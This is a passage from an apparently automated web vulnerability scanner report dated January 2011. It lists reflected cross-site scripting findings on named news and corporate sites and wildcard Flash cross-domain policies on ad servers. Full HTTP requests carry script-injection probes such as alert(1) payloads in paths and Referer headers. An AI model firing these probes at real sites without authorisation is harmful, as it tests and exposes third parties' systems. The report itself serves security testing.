This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videod31f0"><a>5e756706c49/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28605
Vary: Accept-Encoding
Cache-Control: max-age=292
Expires: Wed, 12 Jan 2011 05:12:52 GMT
Date: Wed, 12 Jan 2011 05:08:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videod31f0"><a>5e756706c49">
...[SNIP]...

3.70. http://www.wired.com/video/search/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/video/search/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d05"><a>3d4bdf06559 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoc2d05"><a>3d4bdf06559/search/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28622
Vary: Accept-Encoding
Cache-Control: max-age=280
Expires: Wed, 12 Jan 2011 05:12:40 GMT
Date: Wed, 12 Jan 2011 05:08:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoc2d05"><a>3d4bdf06559 ss_search">
...[SNIP]...

3.71. http://www.wired.com/video/search/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/video/search/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a6e"><a>13c7c111330 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/search32a6e"><a>13c7c111330/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=276
Expires: Wed, 12 Jan 2011 05:16:48 GMT
Date: Wed, 12 Jan 2011 05:12:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_search32a6e"><a>13c7c111330">
...[SNIP]...

3.72. http://www.wired.com/video/search/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wired.com
Path:	/video/search/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b2e3"-alert(1)-"1d49aac262e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /video/search3b2e3"-alert(1)-"1d49aac262e/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

3.73. http://www.addthis.com/bookmark.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 58b68<script>alert(1)</script>3763bb90dac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58b68<script>alert(1)</script>3763bb90dac

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:18:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>58b68<script>alert(1)</script>3763bb90dac - Google search</h4>
...[SNIP]...

3.74. http://www.addthis.com/bookmark.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8dc2"><script>alert(1)</script>e3ab32dcff8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:18:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=a8dc2"><script>alert(1)</script>e3ab32dcff8" />
...[SNIP]...

3.75. http://www.cbsinteractive.com/adfeedback/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cbsinteractive.com
Path:	/adfeedback/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a4ae"><script>alert(1)</script>852aef82148 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /adfeedback/ HTTP/1.1
Host: www.cbsinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4a4ae"><script>alert(1)</script>852aef82148

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:26:14 GMT
Server: Apache/2.2
Keep-Alive: timeout=15, max=868
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 21660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

...[SNIP]...
<input type="hidden" name="refurl" value="http://www.google.com/search?hl=en&q=4a4ae"><script>alert(1)</script>852aef82148" />
...[SNIP]...

3.76. http://www.pwc.com/en_GX/webadmin/forms/contactUs.jhtml [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/en_GX/webadmin/forms/contactUs.jhtml

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3a98"><script>alert(1)</script>ff110ca5099 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /en_GX/webadmin/forms/contactUs.jhtml HTTP/1.1
Host: www.pwc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760111214:ss=1294760084820; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; __utmb=257467274.1.10.1294756485; LD.previous.visitor.us.pwc.com=true;
Referer: http://www.google.com/search?hl=en&q=b3a98"><script>alert(1)</script>ff110ca5099

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:35:30 GMT
Content-Length: 28240
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gx" lang="en-gx">
<h
...[SNIP]...
<input type="hidden" name="SourceLink" value="http://www.google.com/search?hl=en&q=b3a98"><script>alert(1)</script>ff110ca5099" />
...[SNIP]...

3.77. http://www.zdnet.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.zdnet.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaf41"-alert(1)-"1c24072dd63 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: aaf41"-alert(1)-"1c24072dd63

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:13:21 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:13:21 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=982
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 120774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
log.com.com/adlog/c/r=16468&sg=484398&o=10%253A&h=cn&p=&b=2&l=&site=2&pt=2000&nd=10&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e5:4D2D117229E326&orh=aaf41"-alert(1)-"1c24072dd63&oepartner=&epartner=&ppartner=&pdom=aaf41"-alert(1)-"1c24072dd63&cpnmodule=&count=&ra=173.193.214.243&pg=QoA04goPOUsAABpwKpwAAAA6&t=2011.01.12.05.13.21/http://ad.do
...[SNIP]...

3.78. http://www.zdnet.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.zdnet.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55d0"><a>dadba004ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: b55d0"><a>dadba004ac

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:09:29 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:09:29 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 119848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
/adlog.com.com/adlog/i/r=6455&sg=1815&o=10%253A&h=cn&p=&b=2&l=&site=2&pt=2000&nd=10&pid=&cid=0&pp=100&e=&rqid=01c13-ad-e7:4D2CE7575A872D&orh=b55d0"><a>dadba004ac&ort=&oepartner=&epartner=&ppartner=&pdom=b55d0">
...[SNIP]...

3.79. http://www.zdnet.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.zdnet.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e14"><a>7f6f3d790ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: a2e14"><a>7f6f3d790ed

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:11:56 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:11:56 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 119975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
log.com.com/adlog/e/r=18117&sg=478730&o=10%253A&h=cn&p=&b=2&l=&site=2&pt=2000&nd=10&pid=&cid=0&pp=100&e=&rqid=01c13-ad-e2:4D2CD2ED74559F&orh=a2e14"><a>7f6f3d790ed&oepartner=&epartner=&ppartner=&pdom=a2e14">
...[SNIP]...

4. Flash cross-domain policy previous next
There are 9 instances of this issue:

http://ad.crwdcntrl.net/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://ad.uk.doubleclick.net/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://bs.serving-sys.com/crossdomain.xml
http://ad.wsod.com/crossdomain.xml
http://adlog.com.com/crossdomain.xml
http://www.walmart.com/crossdomain.xml
http://www.washingtonpost.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://ad.crwdcntrl.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.crwdcntrl.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 09 Jun 2009 18:20:38 GMT
ETag: "2e70196-a5-46bee6a616980"
Accept-Ranges: bytes
Content-Length: 165
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="*" />
</cross-domain-policy>

4.2. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Wed, 12 Jan 2011 03:00:27 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://ad.uk.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.uk.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.uk.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 17:22:35 GMT
Date: Wed, 12 Jan 2011 03:00:28 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.4. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Thu, 13 Jan 2011 03:00:25 GMT
Date: Wed, 12 Jan 2011 03:00:25 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.5. http://bs.serving-sys.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.6. http://ad.wsod.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 03:00:27 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "906968-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

4.7. http://adlog.com.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adlog.com.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adlog.com.com

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:27 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 6975
Keep-Alive: timeout=15, max=790
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsaroundtheworld.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsig.net"/>
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.reuters.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
